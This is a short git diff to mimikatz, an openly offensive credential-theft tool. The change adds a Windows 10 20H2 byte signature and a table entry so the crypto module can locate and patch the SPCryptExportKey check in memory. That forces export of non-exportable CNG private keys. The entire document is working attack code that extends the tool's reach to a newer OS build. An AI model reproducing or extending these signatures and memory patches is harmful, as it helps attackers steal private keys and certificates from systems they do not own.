diff --git a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c old mode 100644 new mode 100755 index 03d2337..be63bc8 --- a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c +++ b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c @@ -113,6 +113,7 @@ BYTE PTRN_WI81_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75}; BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84}; BYTE PTRN_W10_1703_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x0a, 0x0f, 0x84}; BYTE PTRN_W10_1809_SPCryptExportKey[] = {0xf6, 0x45, 0x24, 0x02, 0x0f, 0x84}; +BYTE PTRN_W10_20H2_SPCryptExportKey[] = {0xf6, 0x45, 0x24, 0x02, 0x75, 0x46}; BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9}; KULL_M_PATCH_GENERIC CngReferences[] = { {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}}, @@ -125,6 +126,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = { {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_W10_1809_SPCryptExportKey),PTRN_W10_1809_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_W10_1809_SPCryptExportKey),PTRN_W10_1809_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_2004, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, + {KULL_M_WIN_BUILD_10_20H2, {sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, }; #elif defined _M_IX86 BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75}; @@ -159,4 +161,4 @@ NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[]) PRINT_ERROR(L"No CNG\n"); } return STATUS_SUCCESS; -} \ No newline at end of file +}